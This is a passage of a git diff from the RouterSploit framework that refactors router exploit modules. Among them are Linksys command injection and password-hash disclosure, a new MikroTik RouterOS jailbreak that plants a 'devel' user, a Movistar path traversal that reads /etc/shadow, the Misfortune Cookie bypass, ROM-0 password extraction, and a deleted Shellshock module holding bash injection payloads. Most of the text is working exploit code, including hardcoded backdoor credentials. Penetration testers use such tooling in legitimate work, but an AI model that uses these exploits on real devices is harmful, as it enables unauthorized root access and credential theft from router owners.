self.port) data = { "submit_button": "Diagnostics", @@ -91,7 +74,12 @@ def check(self): "traceroute_ip": "127.0.0.1" } - response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + response = self.http_request( + method="POST", + path="/apply.cgi", + data=data, + auth=(self.username, self.password) + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/linksys/smartwifi_password_disclosure.py b/routersploit/modules/exploits/routers/linksys/smartwifi_password_disclosure.py index 1ac1b9777..9eafa7a46 100644 --- a/routersploit/modules/exploits/routers/linksys/smartwifi_password_disclosure.py +++ b/routersploit/modules/exploits/routers/linksys/smartwifi_password_disclosure.py @@ -1,57 +1,48 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - mute, - validators, - http_request, - print_info, - print_success, - print_error, -) - -class Exploit(exploits.Exploit): - """ - Exploit Linksys SMART WiFi firmware - If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Linksys SMART WiFi Password Disclosure', - 'authors': [ - 'Sijmen Ruwhof', # vulnerability discovery - '0BuRner', # routersploit module + "name": "Linksys SMART WiFi Password Disclosure", + "description": "Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. " + "If target is vulnerable administrator's MD5 passsword is retrieved.", + "authors": [ + "Sijmen Ruwhof", # vulnerability discovery + "0BuRner", # routersploit module ], - 'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.', - 'references': [ - 'https://www.kb.cert.org/vuls/id/447516', - 'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers', - 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243', - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243', + "references": [ + "https://www.kb.cert.org/vuls/id/447516", + "http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers", + "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243", + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243", ], - 'devices': [ - 'Linksys EA2700 < Ver.1.1.40 (Build 162751)', - 'Linksys EA3500 < Ver.1.1.40 (Build 162464)', - 'Linksys E4200v2 < Ver.2.1.41 (Build 162351)', - 'Linksys EA4500 < Ver.2.1.41 (Build 162351)', - 'Linksys EA6200 < Ver.1.1.41 (Build 162599)', - 'Linksys EA6300 < Ver.1.1.40 (Build 160989)', - 'Linksys EA6400 < Ver.1.1.40 (Build 160989)', - 'Linksys EA6500 < Ver.1.1.40 (Build 160989)', - 'Linksys EA6700 < Ver.1.1.40 (Build 160989)', - 'Linksys EA6900 < Ver.1.1.42 (Build 161129)', + "devices": [ + "Linksys EA2700 < Ver.1.1.40 (Build 162751)", + "Linksys EA3500 < Ver.1.1.40 (Build 162464)", + "Linksys E4200v2 < Ver.2.1.41 (Build 162351)", + "Linksys EA4500 < Ver.2.1.41 (Build 162351)", + "Linksys EA6200 < Ver.1.1.41 (Build 162599)", + "Linksys EA6300 < Ver.1.1.40 (Build 160989)", + "Linksys EA6400 < Ver.1.1.40 (Build 160989)", + "Linksys EA6500 < Ver.1.1.40 (Build 160989)", + "Linksys EA6700 < Ver.1.1.40 (Build 160989)", + "Linksys EA6900 < Ver.1.1.42 (Build 161129)", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target seems to be vulnerable") - url = "{}:{}/.htpasswd".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/.htpasswd" + ) if response is None: print_error("Exploit failed - connection error") return @@ -63,8 +54,10 @@ def run(self): @mute def check(self): - url = "{}:{}/.htpasswd".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/.htpasswd" + ) if response is not None and response.status_code == 200: res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text) diff --git a/routersploit/modules/exploits/routers/linksys/wap54gv3_rce.py b/routersploit/modules/exploits/routers/linksys/wap54gv3_rce.py index 99c3c9775..48c6c8784 100644 --- a/routersploit/modules/exploits/routers/linksys/wap54gv3_rce.py +++ b/routersploit/modules/exploits/routers/linksys/wap54gv3_rce.py @@ -1,65 +1,46 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_info, - random_text, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Linksys WAP54Gv3 devices Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Linksys WAP54Gv3', - 'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.' - 'Debug interface allows executing root privileged shell commands is available' - 'on dedicated web pages on the device.', - 'authors': [ - 'Phil Purviance', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Linksys WAP54Gv3", + "description": "Module exploits remote command execution in Linksys WAP54Gv3 devices. " + "Debug interface allows executing root privileged shell commands is available " + "on dedicated web pages on the device.", + "authors": [ + "Phil Purviance", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://seclists.org/bugtraq/2010/Jun/93', + "references": [ + "http://seclists.org/bugtraq/2010/Jun/93", ], - 'devices': [ - 'Linksys WAP54Gv3', + "devices": [ + "Linksys WAP54Gv3", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - url = "{}:{}/debug.cgi".format(self.target, self.port) data = {"data1": cmd, "command": "ui_debug"} - response = http_request(method="POST", url=url, data=data, auth=("Gemtek", "gemtekswd")) + response = self.http_request( + method="POST", + path="/debug.cgi", + data=data, + auth=("Gemtek", "gemtekswd") + ) if response is None: return "" @@ -72,7 +53,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py b/routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py index 83123dc4b..8755c472d 100644 --- a/routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py +++ b/routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py @@ -1,44 +1,32 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, - shell -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Linksys WRT100/WRT110 devices Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Linksys WRT100/WRT110 RCE', - 'description': 'Module exploits remote command execution in Linksys WRT100/WRT110 devices.' - 'If the target is vulnerable, command loop is invoked that allows executing commands' - 'on operating system level.', - 'authors': [ - 'Craig Young', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Linksys WRT100/WRT110 RCE", + "description": "Module exploits remote command execution in Linksys WRT100/WRT110 devices. " + "If the target is vulnerable, command loop is invoked that allows executing commands " + "on operating system level.", + "authors": [ + "Craig Young", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3568', - 'http://seclists.org/bugtraq/2013/Jul/78', + "references": [ + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3568", + "http://seclists.org/bugtraq/2013/Jul/78", ], - 'devices': [ - 'Linksys WRT100', - 'Linksys WRT110' + "devices": [ + "Linksys WRT100", + "Linksys WRT110", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in') - password = exploits.Option('admin', 'Password to log in') + username = OptString("admin", "Username to log in") + password = OptString("admin", "Password to log in") def run(self): if self.check(): @@ -52,21 +40,25 @@ def run(self): print_error("Target is not vulnerable") def execute(self, cmd): - url = "{}:{}/ping.cgi".format(self.target, self.port) - payload = "& {}".format(cmd) data = { "pingstr": payload } - http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + self.http_request( + method="POST", + path="/ping.cgi", + data=data, + auth=(self.username, self.password) + ) return "" @mute def check(self): - url = "{}:{}/HNAP1/".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/HNAP1/" + ) if response is not None and "WRT110" in response.text: return True # target is vulnerable @@ -74,10 +66,12 @@ def check(self): return False # target is not vulnerable def test_auth(self): - url = "{}:{}/".format(self.target, self.port) - print_status("Trying to authenticate") - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path="/", + auth=(self.username, self.password) + ) if response is None or response.status_code == 401 or response.status_code == 404: print_error("Could not authenticate {}:{}".format(self.username, self.password)) diff --git a/routersploit/modules/exploits/routers/mikrotik/__init__.py b/routersploit/modules/exploits/routers/mikrotik/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py b/routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py new file mode 100644 index 000000000..1dccf2077 --- /dev/null +++ b/routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py @@ -0,0 +1,115 @@ +import re +from struct import pack, unpack +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient + + +class Exploit(SSHClient): + __info__ = { + "name": "Mikrotik RouterOS Jailbreak", + "description": "Module creates \"devel\" user on RouterOS from 2.9.8 to 6.41rc56.", + "authors": ( + "GH0st3rs", # routersploit module + ), + "references": ( + "https://github.com/0ki/mikrotik-tools", + ), + "devices": ( + "Mikrotik RoutersOS versions from 2.9.8 up to 6.41rc56", + ) + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(22, "Target SSH port") + + username = OptString("admin", "Username to log in with") + password = OptString("", "Password to log in with") + + def __init__(self): + self.ssh_client = None + + def run(self): + if self.check(): + print_success("Target seems to be vulnerable") + + if self.backup_configuration(): + print_status("Downloading current configuration...") + content = self.ssh_get_content(self.ssh_client, "/backup.backup") + + backup = self.backup_patch(content) + if backup: + print_status("Uploading exploit...") + if self.backup_restore(backup): + print_success("Jailbreak was (likely) successful.") + print_success("Linux mode can be accessed via telnet using: devel/{}".format(self.password)) + else: + print_error("Unable to apply patched configuration") + else: + print_error("Unable to export current configuration") + + @mute + def check(self): + self.ssh_client = self.ssh_login(self.username, self.password) + + if self.ssh_client: + output = self.ssh_execute(self.ssh_client, "/system resource print") + + res = re.findall(b"version: (.+?) ", output) + if res: + version = str(res[0], "utf-8") + if "rc" in version: + version, rc = version.split("rc") + if version == "6.41" and int(rc) > 56: + return False + + if utils.Version("2.9.8") <= utils.Version(version) <= utils.Version("6.42"): + return True + + return False + + def backup_configuration(self): + output = self.ssh_execute(self.ssh_client, "/system backup save name=\"backup.backup\" dont-encrypt=yes") + if b"backup saved" in output: + return True + else: + output = self.ssh_execute(self.ssh_client, "/system backup save name=\"backup.backup\"") + if b"backup saved" in output: + return True + + return False + + def backup_patch(self, backup): + realsize = len(backup) + if realsize < 8 or backup[:4] != b"\x88\xAC\xA1\xB1": + print_error("Please check if that is a recent RouterOS backup file w/o password protection.") + return False + + matchsize, = unpack("', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Movistar ADSL Router BHS_RTA Path Traversal", + "description": "Module exploits Movistar ADSL Router BHS_RTA Path Traversal " + "vulnerability which allows to read any file on the system.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40734/', + "references": [ + "https://www.exploit-db.com/exploits/40734/", ], - 'devices': [ - 'Movistar ADSL Router BHS_RTA', + "devices": [ + "Movistar ADSL Router BHS_RTA", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/shadow', 'File to read') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/shadow", "File to read") def run(self): if self.check(): - url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(self.target, self.port, self.filename) + path = "/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(self.filename) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return @@ -51,13 +45,14 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:language=es_es&var:page=".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/cgi-bin/webproc?getpage=/etc/passwd&var:language=es_es&var:page=", + ) if response is None: return False # target is not vulnerable - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/multi/misfortune_cookie.py b/routersploit/modules/exploits/routers/multi/misfortune_cookie.py index 0983955cf..952843528 100644 --- a/routersploit/modules/exploits/routers/multi/misfortune_cookie.py +++ b/routersploit/modules/exploits/routers/multi/misfortune_cookie.py @@ -1,34 +1,25 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - http_request, - mute, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Misfortune Cookie', - 'description': 'Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.', - 'authors': [ - 'Check Point ', # vulnerability discovery - 'Jan Trencansky', # proof of concept exploit - 'Marcin Bury ', # routersploit module - 'Milad Doorbash ' # authentication bypass exploit + "name": "Misfortune Cookie", + "description": "Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.", + "authors": [ + "Check Point ", # vulnerability discovery + "Jan Trencansky", # proof of concept exploit + "Marcin Bury ", # routersploit module + "Milad Doorbash ", # authentication bypass exploit ], - 'references': [ - 'http://mis.fortunecook.ie/', - 'http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html', - 'http://piotrbania.com/all/articles/tplink_patch', - 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf' + "references": [ + "http://mis.fortunecook.ie/", + "http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html", + "http://piotrbania.com/all/articles/tplink_patch", + "https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf", ], - 'devices': [ + "devices": [ # brand # model # firmware {'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested {'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ---------- @@ -123,10 +114,9 @@ class Exploit(exploits.Exploit): # Change to tested state if you test it on a real device.don't forget to double check # your device model and full firmware version since each firmware needs its unique cookie # number - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address - port = exploits.Option(80, 'Target port') # default port - device = exploits.Option('', 'Target device (show devices)') # target firmware + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + device = OptInteger("", "Target device (show devices)") def run(self): devices = self._Exploit__info__['devices'] @@ -135,7 +125,6 @@ def run(self): return number = devices[int(self.device)]['number'] offset = devices[int(self.device)]['offset'] - url = "{}:{}".format(self.target, self.port) user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', @@ -145,7 +134,11 @@ def run(self): 'Cache-Control': 'no-cache', 'Cookie': 'C' + str(number) + '=' + 'B' * offset + '\x00'} - response = http_request(method="GET", url=url, headers=headers) + response = self.http_request( + method="GET", + path="/", + headers=headers + ) if response is not None and response.status_code <= 302: print_success( @@ -159,17 +152,22 @@ def run(self): @mute def check(self): - url = "{}:{}/test".format(self.target, self.port) user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' - headers = {'User-Agent': user_agent, - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', - 'Connection': 'keep-alive', - 'Accept-Encoding': 'gzip, deflate', - 'Cache-Control': 'no-cache', - 'Cookie': 'C107373883=/omg1337hax'} + headers = { + "User-Agent": user_agent, + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-language": "sk,cs;q=0.8,en-US;q=0.5,en;q,0.3", + "Connection": "keep-alive", + "Accept-Encoding": "gzip, deflate", + "Cache-Control": "no-cache", + "Cookie": "C107373883=/omg1337hax", + } - response = http_request(method="GET", url=url, headers=headers) + response = self.http_request( + method="GET", + path="/test", + headers=headers + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/multi/rom0.py b/routersploit/modules/exploits/routers/multi/rom0.py index a576af37e..2bbcead75 100644 --- a/routersploit/modules/exploits/routers/multi/rom0.py +++ b/routersploit/modules/exploits/routers/multi/rom0.py @@ -1,70 +1,61 @@ import io import re import sys - -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient from routersploit.utils import lzs -class Exploit(exploits.Exploit): - """ - Exploit implementation for RomPager ROM-0 authentication bypass vulnerability. - If the target is vulnerable it allows to download rom file and extract plaintext password. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'RomPager ROM-0', - 'description': 'Exploits RomPager ROM-0 authentication bypass vulnerability that allows downloading rom file and extract password without credentials.', - 'authors': [ - '0BuRner', # routersploit module + "name": "RomPager ROM-0", + "description": "Exploits RomPager ROM-0 authentication bypass vulnerability that allows downloading " + "rom file and extract password without credentials.", + "authors": [ + "0BuRner", # routersploit module ], - 'references': [ - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4019', - 'http://www.osvdb.org/show/osvdb/102668', - 'https://dariusfreamon.wordpress.com/tag/rompager/', - 'http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/', - 'https://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf', + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4019", + "http://www.osvdb.org/show/osvdb/102668", + "https://dariusfreamon.wordpress.com/tag/rompager/", + "http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/", + "https://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf", ], - 'devices': [ - 'AirLive WT-2000ARM (2.11.6.0(RE0.C29)3.7.6.1)', - 'D-Link DSL-2520U (1.08 Hardware Version: B1)', - 'D-Link DSL-2640R', - 'D-Link DSL-2740R (EU_1.13 Hardware Version: A1)', - 'Huawei 520 HG', - 'Huawei 530 TRA', - 'Pentagram Cerberus P 6331-42', - 'TP-Link TD-8816', - 'TP-Link TD-8817 (3.0.1 Build 110402 Rel.02846)', - 'TP-LINK TD-8840T (3.0.0 Build 101208 Rel.36427)' - 'TP-Link TD-W8901G', - 'TP-Link TD-W8951ND', - 'TP-Link TD-W8961ND', - 'ZTE ZXV10 W300 (W300V1.0.0a_ZRD_CO3)', - 'ZTE ZXDSL 831CII (ZXDSL 831CIIV2.2.1a_Z43_MD)' - 'ZynOS', - 'ZyXEL ES-2024', - 'ZyXEL Prestige P-2602HW', - 'ZyXEL Prestige 782R', + "devices": [ + "AirLive WT-2000ARM (2.11.6.0(RE0.C29)3.7.6.1)", + "D-Link DSL-2520U (1.08 Hardware Version: B1)", + "D-Link DSL-2640R", + "D-Link DSL-2740R (EU_1.13 Hardware Version: A1)", + "Huawei 520 HG", + "Huawei 530 TRA", + "Pentagram Cerberus P 6331-42", + "TP-Link TD-8816", + "TP-Link TD-8817 (3.0.1 Build 110402 Rel.02846)", + "TP-LINK TD-8840T (3.0.0 Build 101208 Rel.36427)", + "TP-Link TD-W8901G", + "TP-Link TD-W8951ND", + "TP-Link TD-W8961ND", + "ZTE ZXV10 W300 (W300V1.0.0a_ZRD_CO3)", + "ZTE ZXDSL 831CII (ZXDSL 831CIIV2.2.1a_Z43_MD)", + "ZynOS", + "ZyXEL ES-2024", + "ZyXEL Prestige P-2602HW", + "ZyXEL Prestige 782R", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Downloading rom-0 file...") - url = "{}:{}/rom-0".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/rom-0", + ) response.raise_for_status() with io.BytesIO(response.content) as f: print_status("Extracting password from file...") @@ -91,16 +82,21 @@ def extract_password(fhandle): @mute def check(self): - url = "{}:{}/rom-0".format(self.target, self.port) - response = http_request(method="HEAD", url=url) + response = self.http_request( + method="HEAD", + path="/rom-0" + ) - if response is None: - response = http_request(method="GET", url=url) + if response is not None: + response = self.http_request( + method="GET", + path="/rom-0", + ) - if response is not None \ - and response.status_code == 200 \ - and "html" not in response.headers['Content-Type']: - # and len(response.text) > 500: - return True + if response is not None \ + and response.status_code == 200 \ + and "" not in response.text \ + and len(response.text) > 500: + return True return False diff --git a/routersploit/modules/exploits/routers/multi/shellshock.py b/routersploit/modules/exploits/routers/multi/shellshock.py deleted file mode 100644 index 83e0de143..000000000 --- a/routersploit/modules/exploits/routers/multi/shellshock.py +++ /dev/null @@ -1,114 +0,0 @@ -import re -import string - -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_info, - random_text, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Shellshock vulnerability. - If the target is vulnerable it allows to execute command on operating system level. - """ - __info__ = { - 'name': 'Shellshock', - 'description': 'Exploits shellshock vulnerability that allows executing commands on operating system level.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://access.redhat.com/articles/1200223', - 'http://seclists.org/oss-sec/2014/q3/649', - 'http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - - path = exploits.Option('/', 'Url path') - method = exploits.Option('GET', 'HTTP method') - header = exploits.Option('User-Agent', 'HTTP header injection point') - - payloads = [ - '() { :;};echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"', # cve-2014-6271 - '() { _; } >_[$($())] { echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"; }', # cve-2014-6278 - ] - valid = None - - def run(self): - if self.check(): - print_success("Target is vulnerable") - print_status("Invoking command loop...") - self.command_loop() - else: - print_error("Target is not vulnerable") - - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - - def execute(self, cmd): - marker = random_text(32) - - url = "{}:{}{}".format(self.target, self.port, self.path) - injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd) - - headers = { - self.header: injection, - } - - response = http_request(method=self.method, url=url, headers=headers) - if response is None: - return - - regexp = "{}(.+?){}".format(marker, marker) - res = re.findall(regexp, response.text, re.DOTALL) - - if len(res): - return res[0] - else: - return "" - - @mute - def check(self): - number = int(random_text(6, alph=string.digits)) - solution = number - 1 - cmd = "echo $(({}-1))".format(number) - - marker = random_text(32) - url = "{}:{}{}".format(self.target, self.port, self.path) - - for payload in self.payloads: - injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) - - headers = { - self.header: injection, - } - - response = http_request(method=self.method, url=url, headers=headers) - if response is None: - continue - - if str(solution) in response.text: - self.valid = payload - return True # target is vulnerable - - return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py b/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py index c60730955..e0dbdeaa7 100644 --- a/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py +++ b/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py @@ -1,284 +1,250 @@ -import paramiko -import StringIO +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient -from routersploit import ( - exploits, - print_success, - print_error, - validators, - mute, - ssh_interactive, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for private key exposure vulnerability. - If the target is vulnerable it is possible to authenticate to the device" - """ +class Exploit(SSHClient): __info__ = { - 'name': 'Multi SSH Authorized Keys', - 'description': 'Module exploits private key exposure vulnerability. If the target is vulnerable it is possible to authentiate to the device.', - 'authors': [ - 'xistence ', # Quantum DXi V1000, Array Networks, Loadbalancer.org Enterprise VA 7.5.2 vulnerability discovery - 'Cristiano Maruti (@cmaruti)', # Baracuda Load Balancer vulnerabiltiy discovery - 'Jasper Greve', # Ceragon FibeAir IP-10 vulnerability doscovery - 'HD Moore', # Ceragon FibeAir IP-10 vulnerability discovery - 'Matta Consulting', # F5 BigIP - 'egypt', # ExaGrid - 'Marcin Bury ', # routersploit module + "name": "Multi SSH Authorized Keys", + "description": "Module exploits private key exposure vulnerability. If the target is " + "vulnerable it is possible to authentiate to the device.", + "authors": [ + "xistence ", # Quantum DXi V1000, Array Networks, Loadbalancer.org Enterprise VA 7.5.2 vulnerability discovery + "Cristiano Maruti (@cmaruti)", # Baracuda Load Balancer vulnerabiltiy discovery + "Jasper Greve", # Ceragon FibeAir IP-10 vulnerability doscovery + "HD Moore", # Ceragon FibeAir IP-10 vulnerability discovery + "Matta Consulting", # F5 BigIP + "egypt", # ExaGrid + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/rapid7/ssh-badkeys', - 'http://packetstormsecurity.com/files/125761/Array-Networks-vxAG-xAPV-Privilege-Escalation.html', - 'http://seclists.org/fulldisclosure/2015/Jan/76', - 'https://github.com/cmaruti/reports/raw/master/barracuda_load_balancer_vm.pdf', - 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15', - 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt', - 'https://community.rapid7.com/community/metasploit/blog/2012/06/11/scanning-for-vulnerable-f5-bigips-with-metasploit', - 'http://packetstormsecurity.com/files/125754/Loadbalancer.org-Enterprise-VA-7.5.2-Static-SSH-Key.html', - 'https://www.kb.cert.org/vuls/id/662676', - 'http://packetstormsecurity.com/files/125755/quantum-root.txt', - 'https://github.com/mitchellh/vagrant/tree/master/keys', - 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials', + "references": [ + "https://github.com/rapid7/ssh-badkeys", + "http://packetstormsecurity.com/files/125761/Array-Networks-vxAG-xAPV-Privilege-Escalation.html", + "http://seclists.org/fulldisclosure/2015/Jan/76", + "https://github.com/cmaruti/reports/raw/master/barracuda_load_balancer_vm.pdf", + "https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15", + "https://www.trustmatta.com/advisories/MATTA-2012-002.txt", + "https://community.rapid7.com/community/metasploit/blog/2012/06/11/scanning-for-vulnerable-f5-bigips-with-metasploit", + "http://packetstormsecurity.com/files/125754/Loadbalancer.org-Enterprise-VA-7.5.2-Static-SSH-Key.html", + "https://www.kb.cert.org/vuls/id/662676", + "http://packetstormsecurity.com/files/125755/quantum-root.txt", + "https://github.com/mitchellh/vagrant/tree/master/keys", + "https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials", ], - 'devices': [ - 'ExaGrid firmware < 4.8 P26', - 'Quantum DXi V1000', - 'Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances', - 'Barracuda Load Balancer', - 'Ceragon FibeAir IP-10', - 'F5 BigIP', - 'Loadbalancer.org Enterprise VA 7.5.2', - 'Digital Alert Systems DASDEC and Monroe Electronics One-Net E189 Emergency Alert System', - 'Vagrant', + "devices": [ + "ExaGrid firmware < 4.8 P26", + "Quantum DXi V1000", + "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances", + "Barracuda Load Balancer", + "Ceragon FibeAir IP-10", + "F5 BigIP", + "Loadbalancer.org Enterprise VA 7.5.2", 